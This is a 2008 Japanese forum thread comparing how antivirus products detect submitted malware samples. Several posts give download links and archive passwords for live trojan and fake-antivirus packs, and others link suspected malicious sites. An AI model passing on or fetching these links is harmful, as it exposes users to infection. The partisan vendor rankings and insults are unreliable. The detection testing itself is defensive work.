前はNODと並んでビリケツ同然だったからな
それよりはマシになったんだろう

206 :名無しさん@お腹いっぱい。:2008/08/16(土) 04:57:53
http://nathan-vasilisim.hp.infoseek.co.jp/04-01-03.html

AntiVirで検出されます [TR/Dldr.Harnig.Y.4]


207 :名無しさん@お腹いっぱい。:2008/08/16(土) 07:42:30
>>205
最近のSymantecは3〜4日で対応してくれることが増えてきた。
まあ遅いこともまだまだあるのは確かだけど。

208 :名無しさん@お腹いっぱい。:2008/08/16(土) 09:13:45
Kingsoftも参加

209 :名無しさん@お腹いっぱい。:2008/08/16(土) 14:39:46
//tklolicon.phpnet.us/b/

このURLを踏んでしまいました
その貼ってあったスレでトロイと言われたのですが本当でしょうか?

210 :名無しさん@お腹いっぱい。:2008/08/16(土) 15:31:21
>>207
>>203
その日の内に対応してるよ

211 : ◆W32/Vael.o :2008/08/16(土) 15:33:06
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=63
Malware-Pack38

212 :名無しさん@お腹いっぱい。:2008/08/16(土) 15:33:50
>>210
他社も即日対応してるから自慢にならん
おそらく感染被害が多かったんだと思う

213 :名無しさん@お腹いっぱい。:2008/08/16(土) 15:36:18
>>211
Rising Antivirus 20.57.50
8\wab.exe: Packer.Win32.Agent.r

214 :名無しさん@お腹いっぱい。:2008/08/16(土) 15:49:22
>>211
NIS2008で3/12 (1、7、a、)
未検出は贈っておきました

215 :210:2008/08/16(土) 15:51:39
>>212
感染被害が多いor少ないのと
対応速度はまったく別の話だよ

216 :名無しさん@お腹いっぱい。:2008/08/16(土) 15:59:49
報告数の多い検体から先に処理するのは常識だが

217 :名無しさん@お腹いっぱい。:2008/08/16(土) 16:00:45
>>215
え?

218 :名無しさん@お腹いっぱい。:2008/08/16(土) 16:07:41
>報告数の多い検体から先に処理するのは常識

今、調査してみたら
Nortonユーザーで、>>203の感染者はとくに多くはなかったし

219 :名無しさん@お腹いっぱい。:2008/08/16(土) 16:09:05
>>218
どんな調査を行ったのか詳細よろ

220 :名無しさん@お腹いっぱい。:2008/08/16(土) 16:16:53
>>211
0 http://www.virustotal.com/jp/analisis/7f478b0846bd800bb8a06a216809aaf8
1 http://www.virustotal.com/jp/analisis/9120f2915430ecbd042bf71b16ae782c
2 http://www.virustotal.com/jp/analisis/33b37f9c458abec948208869c964abb5
3 http://www.virustotal.com/jp/analisis/e7562ee0966c11cf55fa96f735229eb1
4 http://www.virustotal.com/jp/analisis/ba2855c776aef9c84d6018e7971013f1
5 http://www.virustotal.com/jp/analisis/3b3a4d5517a622c75d00570f8809f155
6 http://www.virustotal.com/jp/analisis/4a595a465556e786ad928ea4239c28d5
7 http://www.virustotal.com/jp/analisis/7aeb073ed80197e1d1f71c35277ab18f
8 http://www.virustotal.com/jp/analisis/d7b991cc2d2aba95af0061f36a02d07d
9 http://www.virustotal.com/jp/analisis/f637b5b6124d1c2c81d2c0ad1f5c17b9
a http://www.virustotal.com/jp/analisis/dacd08c04a56549a37b1e5f769225572
b http://www.virustotal.com/jp/analisis/04fc0b10625415509a8032893309b261


















221 :名無しさん@お腹いっぱい。:2008/08/16(土) 17:32:28
>>219
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-062711-5534-99
Trojan.Blusod
感染報告数: 0 - 2

222 :名無しさん@お腹いっぱい。:2008/08/16(土) 17:49:39
> >>186を昨日の時点でDLしたもの↓

> 発見日: 2008 年 6 月 27 日
> 更新日: 2008 年 6 月 30 日 9:38:31 AM

対応速ええw

223 :名無しさん@お腹いっぱい。:2008/08/16(土) 19:09:41
XREAトロイ( >>197 )の新型
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=64
virus

224 :名無しさん@お腹いっぱい。:2008/08/16(土) 21:10:02
>>211,223
d

カスペ2009 17:23:00
>>211
4/12(3,6,7,b)

Detected Trojan program Trojan-Downloader.Win32.Banload.tdx tane0063\Malware\3\telegrama489019283.exe
Detected riskware not-a-virus:FraudTool.Win32.Agent.at tane0063\Malware\6\pcprotectioncenter_setup.exe
Detected Trojan program Trojan.Win32.Agent.ycd tane0063\Malware\7\name.avi.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.stt tane0063\Malware\b\install_flash_player.exe

検体提出します。

>>223

3/3
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sreq tane0064.zip/xrea6.dll
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srkz tane0064.zip/xrea6.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srkt tane0064.zip/xrea6.sys

225 :名無しさん@お腹いっぱい。:2008/08/16(土) 22:05:35
>>209もおねがいします!

226 :名無しさん@お腹いっぱい。:2008/08/16(土) 22:09:35
>>225
AVGだと検出しなかったけどな。不安なら無料アンチウイルスソフトを常駐させておきな。

227 :名無しさん@お腹いっぱい。:2008/08/16(土) 22:29:04
>>225
ここは鑑定スレではありません。

http://pc11.2ch.net/test/read.cgi/hack/1208760889/

228 :224:2008/08/16(土) 22:46:47
>>221
カスペからの返事。index2.htmは回答待ち。
合計 8/12(1回答待ち)

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

IAInstall.exe - Trojan-Downloader.Win32.FraudLoad.vbek (Vyacheslav Zakorzhevsky)
Trojan-Downloader.Win32.FraudLoad.vbek - (Andrey Bezborodov,)
tracesweeper_setup.exe - not-a-virus:FraudTool.Win32.TraceSweeper.a
wab.exe_ - Trojan-Downloader.Win32.Dadobra.azp

---------------------------------------------------------
Hello.

skinnerv.exe (Andrey Bezborodov,)
MDL_1.4.5408.exe (Vyacheslav Zakorzhevsky)
Belote.exe (Andrey Bezborodov,)

No malicious software was found in the attached file.

229 :名無しさん@お腹いっぱい。:2008/08/16(土) 22:53:06
>>211
236789abが黒、5がグレー、014が白、でFAかな

230 :名無しさん@お腹いっぱい。:2008/08/16(土) 23:05:01
>>211
kingsoft

7=Win32.Troj.Agent134144
b=Win32.TrojDownloader.Banload.17920

>>223
スルー


両方ともKingsoftに送りました

231 :名無しさん@お腹いっぱい。:2008/08/17(日) 00:14:42
K7AntiVirus 9.5.0521

>>197
2/6
fsg1.exe,Infected by Backdoor.Win32.Small.dmz,Cleaned ,
upk1.exe,Infected by Trojan-Downloader.Win32.Small.wuz,Cleaned ,

>>211
1/12
Malware\6,pcprotectioncenter_setup.exe,Infected By not-a-virus:FraudTool.Win32.Agent.at

>>223
0/3

232 :名無しさん@お腹いっぱい。:2008/08/17(日) 04:44:42
>>223
Rising Antivirus 20.57.52
スルー

233 :名無しさん@お腹いっぱい。:2008/08/17(日) 11:54:21
>>223
McAfeeスルーヽ(`Д´)ノ

234 :名無しさん@お腹いっぱい。:2008/08/17(日) 12:25:50
XREAトロイ( >>223 )の新型とおまけ。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=65
virus

おまけはあちこちにscriptを突っ込んでいる1ive■netでばら撒き中のダウンローダが拾うバイナリ。

235 :名無しさん@お腹いっぱい。:2008/08/17(日) 12:31:44
>>234
Rising Antivirus 20.57.52
mess.exe>>DLLFILE2: Trojan.PSW.Win32.GameOL.oub
mess.exe: Trojan.PSW.Win32.GameOL.oub
mess2.exe: Trojan.PSW.Win32.GameOL.oub

236 :名無しさん@お腹いっぱい。:2008/08/17(日) 13:48:46
>>234
McAfee

mess.exe, mess1.exe, mess2.exe : Generic PWS.y

237 :名無しさん@お腹いっぱい。:2008/08/17(日) 14:14:26
xrea6.sysとxrea7.sysはMD5一緒じゃね?

238 :名無しさん@お腹いっぱい。:2008/08/17(日) 14:45:00
大元のexeしかハッシュチェックしてません
(sysはexeからドロップされる物、たぶんrootkit)。

239 :199:2008/08/17(日) 15:44:39
Risingより
>>197
   文件名:xrea5taa.exe, xrea5taa1.exe
   病毒名:Trojan.PSW.Win32.GameOL.pjg

240 :213=232:2008/08/17(日) 17:12:09
Risingより
>>211
   文件名:MDL_1.4.5408.exe
   不是病毒
他は解析待ち
>>223
   文件名:xrea6.dll, xrea6.exe
   病毒名:Trojan.PSW.Win32.WoWar.asm
   文件名:xrea6.sys
   不是病毒

241 :名無しさん@お腹いっぱい。:2008/08/17(日) 22:33:03
>>234
d
カスペ2009 16:23:00

6/6

Detected Trojan program Trojan-GameThief.Win32.WOW.bhs tane0065.zip/mess.exe
Detected Trojan program Trojan-PSW.Win32.WOW.arz tane0065.zip/mess1.exe
Detected Trojan program Trojan-GameThief.Win32.WOW.bht tane0065.zip/mess2.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sreq tane0065.zip/xrea7.dll
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srvv tane0065.zip/xrea7.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srkt tane0065.zip/xrea7.sys

242 :名無しさん@お腹いっぱい。:2008/08/17(日) 23:35:58
http://webtron.org/up/img/243.zip

243 :名無しさん@お腹いっぱい。:2008/08/18(月) 00:02:23
>>242
http://www.virustotal.com/analisis/e8d56b5767d06f4cd24ec2b7be6b8f7d

244 :名無しさん@お腹いっぱい。:2008/08/18(月) 02:31:42
http://www.cyokinde.com/gungho08/ro/10155326p.rar

245 :名無しさん@お腹いっぱい。:2008/08/18(月) 03:25:11
>>244
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/779

246 :名無しさん@お腹いっぱい。:2008/08/18(月) 10:39:29
>>244
http://www.virustotal.com/jp/analisis/5b93df4c90e1cb6510c32e5aace15444

247 :名無しさん@お腹いっぱい。:2008/08/20(水) 18:07:11
いつの間にかjottiからa2が消えてるな

248 :名無しさん@お腹いっぱい。:2008/08/20(水) 18:24:14
http://www.excite-blog.com/keyword/d0808033566_5linmovesmm2.rar

249 :名無しさん@お腹いっぱい。:2008/08/20(水) 19:31:31
>>248
http://www.virustotal.com/analisis/2c497c6c566604796cd4fe8396fe8f9e

250 :名無しさん@お腹いっぱい。:2008/08/20(水) 19:36:20
ついでに>>244はSymantec対応
http://www.virustotal.com/analisis/2c497c6c566604796cd4fe8396fe8f9e

251 :名無しさん@お腹いっぱい。:2008/08/20(水) 20:14:29
>>250
URLが>>249

252 :名無しさん@お腹いっぱい。:2008/08/20(水) 20:22:08
>>251
失礼しました
http://www.virustotal.com/analisis/a03fbf5d6a826bcca6035ad95cf7c75c

253 :名無しさん@お腹いっぱい。:2008/08/21(木) 09:18:48
>>247
a2復活してるな。一時メンテだとしても、わざわざバナーまで消すとは。

254 :名無しさん@お腹いっぱい。:2008/08/21(木) 20:45:27
http://venus.bbspink.com/test/read.cgi/ascii/1218206258/561


255 :名無しさん@お腹いっぱい。:2008/08/21(木) 21:48:51
>>254
>>3


256 :名無しさん@お腹いっぱい。:2008/08/22(金) 01:50:16
>>254
http://www.virustotal.com/analisis/17c3254f8441dd234d42d1d54c4a040e

257 :名無しさん@お腹いっぱい。:2008/08/23(土) 05:48:08
【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/244

244 名前:名無しさん@お腹いっぱい。[] 投稿日:2008/08/20(水) 04:19:59
DLしたファイルを開いたら偽造された実行ファイルでウイルスバスターが隔離したけど、
ものすごい速度でファイルをコピーしはじめてそれは隔離されたので削除しました。とりあえず怪しい実行ファイルのプロセスを終了して
今ウイルスバスターでスキャンかけてます。
デスクトップに二つアイコンが出来て「PEEP SHOW」てのと「Vista Antivirus 2008」ってのです。
検索の途中ですけど「TROJ_BHO.SK」がひっかかってますが「ウイルスが処理できません」です。
もうリカバリしかないでしょうか?よろしくお願いします



258 :名無しさん@お腹いっぱい。:2008/08/23(土) 09:06:20
書庫にまでパスかけるのはやめてほしいなあ

259 :名無しさん@お腹いっぱい。:2008/08/23(土) 11:32:46
いやそれは必須でしょ

260 :名無しさん@お腹いっぱい。:2008/08/24(日) 14:53:02
検知力テスト(2008年8月23日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/

Rank Detects Missed Product
1st 97% 95 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 174 Ikarus
4th 93% 205 BitDefender
5th 92% 256 AVG
6th 92% 264 F-Secure
7th 89% 356 Avast
8th 88% 375 Norman
9th 88% 378 Sophos
10th 85% 477 Kaspersky
11th 85% 480 ClamAV
12th 84% 514 Microsoft
13th 84% 517 CAT-QuickHeal
14th 84% 537 VirusBuster
15th 82% 577 DrWeb
16th 80% 656 Rising
17th 80% 670 F-Prot
18th 80% 670 Fortinet
19th 79% 690 eTrust-Vet
20th 79% 692 Symantec
21st 76% 780 TheHacker
22nd 74% 874 AhnLab-V3
23rd 73% 888 VBA32
24th 73% 902 McAfee
25th 72% 942 Panda
26th 70% 988 Authentium
27th 69% 1020 NOD27w

261 :名無しさん@お腹いっぱい。:2008/08/24(日) 23:47:22
>>260

スレ違い&信頼性に欠けるデータ
Wilders Security Forumsの奴も取り上げないよ。

262 :名無しさん@お腹いっぱい。:2008/08/25(月) 00:09:13
たった3372の検体で何が分かるんだろうなw

263 :名無しさん@お腹いっぱい。:2008/08/25(月) 01:43:08
NODが糞なのはわかる

264 :名無しさん@お腹いっぱい。:2008/08/25(月) 07:23:58
俺のところにしょっちゅうメールでマルウェアが来るが
俺の環境だとNODあたりはもっと良いね
avastやBitDefenderはもっと悪い
実際の運用では環境によってかなり違うだろうな

265 :名無しさん@お腹いっぱい。:2008/08/25(月) 09:22:14
↑所詮お前の環境だろ。
このスレではNODはゴミという事実は消えないよ。
しかもAV-Testのテスト結果でもNODはゴミという評価だし。

266 :名無しさん@お腹いっぱい。:2008/08/25(月) 09:43:38
おまえ馬鹿だろ
いや基地外か

267 :名無しさん@お腹いっぱい。:2008/08/25(月) 09:56:45
NOD厨が基地外

268 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:16:00
NOD厨とか言ってるのが基地外だろ
よく感がえろ
無理だろうけど


269 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:49:33
NODは優秀なのでSRI捏造テストのインチキ検体はスルーします^^

270 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:50:59
感がえろ(笑)
感がえろ(笑)
感がえろ(笑)

271 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:52:18
×感がえろ
○よく感がえろ

272 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:53:25
NOD厨の日本語能力はゆとり以下

273 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:57:04
>>272
よく感がえろ

274 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:58:33
このスレではぶっちぎり最下位のNODの信者が発狂して荒らしてますw

275 :名無しさん@お腹いっぱい。:2008/08/25(月) 10:58:56
今やNODはなぜかバスター、ノートンより2chじゃ有名

276 :名無しさん@お腹いっぱい。:2008/08/25(月) 11:08:31
よく感がえろ

277 :名無しさん@お腹いっぱい。:2008/08/25(月) 11:27:31
NODは悪い意味でノートンやバスターより有名。

バスターより早く公式HPでウイルスばらまいたしねw

278 :名無しさん@お腹いっぱい。:2008/08/25(月) 23:18:24
ウイルス対応速度

AntiVir、AVG、カスペ:1日、遅くても2日
avast!、BitDefender、Norton、バスター:早くて1〜2日、遅くて3日以上

NOD27:早くて一週間、遅くて20日以上、最悪の場合対応しない。

いろいろ検体送ったけどマジでNODはこんな感じだった。
マカフィーはどう?印象としてはNODと同じくらいな気がするけど。

279 :名無しさん@お腹いっぱい。:2008/08/26(火) 12:54:35
>>278
McAfeeは俺の送ったサンプルの対応期間だと
1/3が1週間以内に対応、1ヶ月以内に6割弱、半年で8割、
1年で99%、それ以上かかるのが少々ってとこか

シロ判定の返事は来ないんで、いまだに検出しないのは
対応しないのかこれから対応するのか判断がつかん

280 :279:2008/08/26(火) 12:56:02
数字間違った
半年で9割に訂正してくれ

281 :名無しさん@お腹いっぱい。:2008/08/26(火) 16:40:18
数学大丈夫?

ま、どっちにしてもマカフィーの対応速度もかなり酷いな。
ノートンはまだ噂の段階だけど2009で一日のアップデート回数がかなり増えるみたいだから今後のノートンの検出率とウイルス対応速度の向上に期待。

バスターはやはりtrendlab USAが効いてるのかな?

282 : ◆W32/Vael.o :2008/08/26(火) 18:32:33
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=67
Malware-Pack39

283 :名無しさん@お腹いっぱい。:2008/08/26(火) 18:52:45
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=68
パス:infected

284 :名無しさん@お腹いっぱい。:2008/08/26(火) 19:00:07
Rising Antivirus 20.59.11
>>282
4\10.exe: Trojan.DL.Win32.Mnless.avt
5\8.exe: Trojan.DL.Win32.Mnless.avk
b\setup.exe>>$WINDIR\setups.exe>>$WINDIR\IEBHO.dll,
b\setup.exe>>$WINDIR\setupc.exe>>$WINDIR\IEBHO.dll: AdWare.Win32.Agent.cda
>>283
AdultManiac.exe>>upx_c,
EroAnimePlayer.exe>>upx_c: Trojan.Win32.VB.ful
HyperErectCollection.exe>>upx_c: Trojan.Win32.VB.fuk

285 :名無しさん@お腹いっぱい。:2008/08/26(火) 21:51:43
>>282,>>283
d

カスペ2009

>>282
9/12

Detected riskware not-a-virus:FraudTool.Win32.XPAntivirus.pi tane0067.zip/Malware/0/maxantispy.exe
Detected riskware not-a-virus:FraudTool.Win32.XPShield.d tane0067.zip/Malware/1/XPGuardSetup.exe
Detected riskware not-a-virus:FraudTool.Win32.MSAntivirus.a tane0067.zip/Malware/2/MSASetup.exe
Detected riskware not-a-virus:FraudTool.Win32.MSAntivirus.a tane0067.zip/Malware/2/MSASetup.exe
Detected Trojan program Trojan-Downloader.Win32.Tiny.bvl tane0067.zip/Malware/4/10.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.abxz tane0067.zip/Malware/5/8.exe
Detected Trojan program Trojan-Downloader.Win32.Exchanger.qb tane0067.zip/Malware/6/player.exe
Detected Trojan program Trojan.Win32.BHO.gef tane0067.zip/Malware/7/c-setup.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.acs tane0067.zip/Malware/9/antivirus.v.1.0.exe
Detected Trojan program Backdoor.Win32.Frauder.af tane0067.zip/Malware/a/Setup_trsupersolution-freeantivirus_com.exe

>>283
4/7
Detected Trojan program Trojan-PSW.Win32.VB.vb tane0068.zip/one-click/AdultManiac.exe
Detected Trojan program Trojan-PSW.Win32.VB.ta tane0068.zip/one-click/EroAnimePlayer.exe
Detected Trojan program Trojan-PSW.Win32.VB.vc tane0068.zip/one-click/MovieTubes.exe
Detected Trojan program Trojan-PSW.Win32.VB.vd tane0068.zip/one-click/SexyRoots.exe

検体提出します。

286 :285:2008/08/26(火) 22:05:30
VT上では、カスペ7、>>283につき

HyperErectCollection.exe     Trojan-PSW.Win32.VB.wd
MoviesServiceProvider.exe    Trojan-PSW.Win32.VB.we

追加検出。

287 :名無しさん@お腹いっぱい。:2008/08/26(火) 22:29:56
K7AntiVirus 9.5.0528

>>282
6/12
Malware\1,XPGuardSetup.exe,Infected By not-a-virus:FraudTool.Win32.XPShield.d ,Cleaned ,
Malware\4,10.exe,Infected By Trojan-Downloader.Win32.Tiny.bvl ,Cleaned ,
Malware\5,8.exe,Infected By Trojan-Downloader.Win32.Agent.abxz ,Cleaned ,
Malware\6,player.exe,Infected By Trojan-Downloader.Win32.Exchanger.qb ,Cleaned ,
Malware\7,c-setup.exe,Infected by Trojan.Win32.BHO.gef,Cleaned ,
Malware\9,antivirus.v.1.0.exe,Infected By Trojan-Downloader.Win32.Banload.acs ,Cleaned ,

>>283
1/7
one-click,EroAnimePlayer.exe,Infected By Trojan-PSW.Win32.VB.ta ,Cleaned ,


名前はカスペといっしょ

288 :名無しさん@お腹いっぱい。:2008/08/26(火) 22:36:48
>>282 8のみ白(11/12) >>283 真っ黒(7/7) で決まりかな

289 :名無しさん@お腹いっぱい。:2008/08/26(火) 22:44:54
NOD32 3388 (20080826)

>>283 5/7
one-click\AdultChannel.exe - Win32/PSW.VB.QX トロイの木馬
one-click\EroAnimePlayer.exe - Win32/PSW.VB.NBL トロイの木馬
one-click\HyperErectCollection.exe - Win32/PSW.VB.NBO トロイの木馬
one-click\MovieTubes.exe - Win32/PSW.VB.NBR トロイの木馬
one-click\SexyRoots.exe - Win32/PSW.VB.NBQ トロイの木馬

>>282 8/12
Malware\1\XPGuardSetup.exe - Win32/Adware.XPGuard アプリケーション
Malware\2\MSASetup.exe > ZIP > MSA.cpl - Win32/Adware.Antivirus2008 アプリケーション
Malware\2\MSASetup.exe > ZIP > MSA.exe - Win32/Adware.Antivirus2008 アプリケーション
Malware\4\10.exe - Win32/TrojanDownloader.Tiny.NDP トロイの木馬
Malware\5\8.exe - Win32/TrojanDownloader.QQHelper.NHG トロイの木馬
Malware\6\player.exe - Win32/Agent.ETH トロイの木馬
Malware\7\c-setup.exe - Win32/Adware.IeDefender.NGUの亜種である可能性 アプリケーション
Malware\9\antivirus.v.1.0.exe - Win32/TrojanDownloader.Agent.ODV トロイの木馬
Malware\a\Setup_trsupersolution-freeantivirus_com.exe - Win32/TrojanDownloader.FakeAlert.HJ トロイの木馬

290 :名無しさん@お腹いっぱい。:2008/08/26(火) 23:36:41
>>282
NIS2008で8/12 (0、1、2、4、5、6、7、9)
未検出は贈っておきました

>>283
NIS2008で7/1
未検出は贈っておきました

291 :290 訂正:2008/08/26(火) 23:39:59
>>283
NIS2008で1/7
未検出は贈っておきました

292 :285:2008/08/27(水) 02:00:43
カスペからの返事 2つ。残り2つ返事待ち。

Hello,

AdultChannel.exe_ - Trojan-PSW.Win32.VB.wg
install.exe - (検体名記載なし。何らかのmalware)

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Namestnikov Yury


>>283は、PC上でも検知済み。
HyperErectCollection.exe     Trojan-PSW.Win32.VB.wd
MoviesServiceProvider.exe    Trojan-PSW.Win32.VB.we

結局、
>>282 10/12(返事待ち2:setup.exe, noadware,.exe)
>>283 7/7

293 :285:2008/08/27(水) 17:31:14
>>282
カスペ〜の返事 上記未報告分2件

Hello.

noadware.exe
No malicious software was found in the attached file.

setup.exe - not-a-virus:FraudTool.Win32.sentinel

New potentially risk software was found in these files.
Detection will be included in the next update.
Thank you for your help.

Please quote all when answering.

294 :名無しさん@お腹いっぱい。:2008/08/27(水) 20:07:28
http://applis.servehttp.com/index.htm
ファイル名:00023568.rar パスワード:abcd


295 :名無しさん@お腹いっぱい。:2008/08/27(水) 21:18:33
>>294
>>3

296 :名無しさん@お腹いっぱい。:2008/08/27(水) 22:12:14
>>294
http://www.virustotal.com/jp/analisis/1a674a0ade29cd3ad7e68f4204b3b36c

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=69
DLKey:abcd

297 :名無しさん@お腹いっぱい。:2008/08/27(水) 22:16:39
最近バスターはPAK_Generic.001といったGeneric検出がやたらと増えてきたな。
このスレ的には優秀な結果になるから良いんだけど誤検出が凄いことになりそう・・・
バスター以外でGeneric検出が得意なベンダーはAVGやavast!、BitDefender辺りか。

298 :296:2008/08/27(水) 22:20:01
ダウソキーを貼り間違えた
DLKey:Virus

299 :名無しさん@お腹いっぱい。:2008/08/28(木) 00:20:38
>>297
Packer捕獲してるだけだよ。最近増えてきたなこういうの。

300 :名無しさん@お腹いっぱい。:2008/08/28(木) 00:31:56
正規のアプリはパッカー使う必然性が全く無いから、パッカー捕捉でも問題ない
アングラ系ツールを除けば、DQN作者のフリーウェアで使われる程度だろ

301 :名無しさん@お腹いっぱい。:2008/08/28(木) 00:59:13
そうなんだよな、その時点で怪しいんだよな
怪しい物を捕らえる、という意味ではとりあえず捕獲して判断はユーザーに委ねる、という方法も悪くない

302 :名無しさん@お腹いっぱい。:2008/08/28(木) 01:01:18
逆にPacker捕獲があまり強くないベンダーって?
Symantecはそういうのが弱そうに見えるけど・・・

ま、NOD27とZEROは論外、この二つのゴミはそれ以前に新種のスルーっぷりが異常。

303 :名無しさん@お腹いっぱい。:2008/08/28(木) 05:54:37
>>296
カスペからの返事

Hello.
No malicious software was found in the attached file.

Please quote all when answering. Do not forget to include you registration data.
-----------------
Regards, Vyacheslav Zakorzhevsky

304 :名無しさん@お腹いっぱい。:2008/08/28(木) 09:01:13
http://www.koha0kohaweb.com/play/GVG/lid576460752303920704.rar

305 :名無しさん@お腹いっぱい。:2008/08/28(木) 09:08:02
>>302
弱いんじゃなく、やってないだけ。
官庁や大企業だと高価なアプリ(独自含む)を使ってることが多くて、
解析の妨害のためにPackerを使うことがよくある。
それを万が一誤検知されたら大騒ぎになるんでね。
自力でUnpackできない物に関しては触らない、というのは
Norton、McAfee、Dr.WEB、Kasperskyあたり。
そりゃ引っ掛ければ数字の上で成績は上がるんだけどさ。

306 :名無しさん@お腹いっぱい。:2008/08/28(木) 09:13:26
あとNODも触らない。
AntiVirも前はそうだったんだけど、今は引っ掛けちゃう。
昔から引っかけまくるのはSophos、Panda、avastあたり。
Sophosに関しては「ウチはそういう方針だ」とメールもらったことがある
(逆に「スクリプトはウチはやらない」とも)。

PEiDで引っ掛ける程度のメジャーなPackerを判別できないベンダーは
いまどきないだろうけど(ソースネクストは知らんが)、
Unpackできるかどうかはまた別なわけで。
この辺は灰色を白とするか黒とするかのポリシーの違い。

307 :名無しさん@お腹いっぱい。:2008/08/28(木) 10:21:53
>>305
そんな糞アプリを納入するゴミ会社は早めに淘汰しておかないと
この先マルウェア対策ができなくなるな

308 :名無しさん@お腹いっぱい。:2008/08/28(木) 17:16:47
メモ帳を汎用的なUPXで圧縮しただけでも、VTで反応するベンダーもあるくらい。
機密保持のためのファイルの暗号化の開発も正当化されるから仕方がない。
落ち物拾わなければ、少しでも黒反応のものは実行しない方がいいと思うが
鑑定スレじゃないし

309 :名無しさん@お腹いっぱい。:2008/08/28(木) 18:02:29
UpackだのnPackだのFSGだのはベンダの考えで好きにしていいと思うが
UPXは標準でUnpackできる上にソース公開されてるんだから
zipの中身調べられませんってレベルだよ。Unpackして検査してくれ。

310 :名無しさん@お腹いっぱい。:2008/08/28(木) 20:10:55
>>305
なるほどね。
確かにGeneric検出をよくやるAntiVir、avast!、AVG、BitDefender、バスターに対しNorton、KasperskyはGeneric検出というのをあまり見ないというか見たことない。
その代わりKasperskyは鬼対応速度と鬼更新でカバーしてるという感じ、Nortonも最近はそんな感じだし2009はカスペ路線の鬼更新らしいね。

311 :名無しさん@お腹いっぱい。:2008/08/28(木) 21:29:33
>>310
個人ユーザーにまったく売れなくなったから団体向けに路線変更したのかな?

312 :名無しさん@お腹いっぱい。:2008/08/28(木) 22:39:34
GDATAは2009からKaspersky→BitDefenderになる模様。
といあえずBitDefenderの有料版を使ってみたかったから助かるし一日のアップデート回数はカスペからBitになっても変わらないとは思うけど検出性能はどうなんだろ・・・

個人的には去年一時期はかなり調子悪くスルーするトロイが多かったけど最近は復調気味という印象>BitDefender
BitDefenderは各国のAmazon見る限りかなり売れてるからそのお金でMSに流出してしまった人材をまた確保できたのかな?

313 :名無しさん@お腹いっぱい。:2008/08/28(木) 23:03:33
avastからBitに戻ったんじゃなくて、カスペからBitかよ

314 :名無しさん@お腹いっぱい。:2008/08/28(木) 23:06:56
どうせならavast!、AVG、BitDefenderのトリプルエンジンやって欲しかったな。
この3つならカスペ捨てても検出率高そう。

315 :名無しさん@お腹いっぱい。:2008/08/28(木) 23:38:20
avastは誤が多いからなぁ。AVG+Bitで十分な気が。
あとどこでもいいからシグネチャ重視のとVBA32と組み合わせて
どこかで出してくれないかな。
VBA32のパラノイドヒューリスティックはDr.WEBをトンガらせた感じで
(いい意味で)かなりイカレてる。


316 :名無しさん@お腹いっぱい。:2008/08/29(金) 00:02:15
このスレ的な検出性能はAVG>avast!、BitDefenderだな
去年辺りはAVGの大躍進とBitDefenderの一時的な凋落でAVG>>>avast!、BitDefenderだったけど今年に入ってavast!の躍進とBitの復調で差が縮まった。
もちろんAVGは相変わらず良い感じだけど。

317 :名無しさん@お腹いっぱい。:2008/08/29(金) 11:33:27
AVGは一度スルーされて感染した俺的にはクソ。

318 :名無しさん@お腹いっぱい。:2008/08/29(金) 11:45:11
>>317 メッセンジャー経由のウイルスでしょ

319 :名無しさん@お腹いっぱい。:2008/08/29(金) 12:40:29
一番スレでやれ

320 :名無しさん@お腹いっぱい。:2008/08/29(金) 21:09:40
AntiVirがあれば他はいらない

321 :名無しさん@お腹いっぱい。:2008/08/30(土) 19:59:38
バスターはいつの間にか土曜日もアップデート配信するようになったんだな。
これも米国にウイルス解析所設立した効果かな?

322 :名無しさん@お腹いっぱい。:2008/08/30(土) 20:46:36
バスターのラボはフィリピンしか仕事してないよ。
りーじょなるwトレンドラボだか東京に作ったけど
Winnyばっかやって仕事してねーし。

323 :名無しさん@お腹いっぱい。:2008/08/31(日) 22:59:19
nyで感染ファイルあつめまくってくれてるんならいいが…w

324 :名無しさん@お腹いっぱい。:2008/09/01(月) 01:18:52
いやそうだろ。いいか悪いかは知らんけどな。

325 :名無しさん@お腹いっぱい。:2008/09/01(月) 10:29:15
http://www.geocities.jp/kaneman010/winny/winny2.zip

326 :名無しさん@お腹いっぱい。:2008/09/01(月) 12:20:52
http://livedoorbloog.com/keyword/d0808033566_5linmovesmm2.rar

327 :名無しさん@お腹いっぱい。:2008/09/01(月) 13:56:33
>>326
ttp://www.virustotal.com/analisis/e6fb99bf046bae170ab6c706d8064008
Norton、McAfee、BitDefender以外はだいたい検知

328 :名無しさん@お腹いっぱい。:2008/09/01(月) 16:43:55
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=70
パス:virus

329 :名無しさん@お腹いっぱい。:2008/09/01(月) 19:43:12
>>328
http://changi.2ch.net/download/

330 :名無しさん@お腹いっぱい。:2008/09/01(月) 20:39:17
>>329
http://etc7.2ch.net/denpa/

331 :名無しさん@お腹いっぱい。:2008/09/01(月) 21:12:40
>>328
解凍パスは?

332 :328:2008/09/01(月) 21:56:13
